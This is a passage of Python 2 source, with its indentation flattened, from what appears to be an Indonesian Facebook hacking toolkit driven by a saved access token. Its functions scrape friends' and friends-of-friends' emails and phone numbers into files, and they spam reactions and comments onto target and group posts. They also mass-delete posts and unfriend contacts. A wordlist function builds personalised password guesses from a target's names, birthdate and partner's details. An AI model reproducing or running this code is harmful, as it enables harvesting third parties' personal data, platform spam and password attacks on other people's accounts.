mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
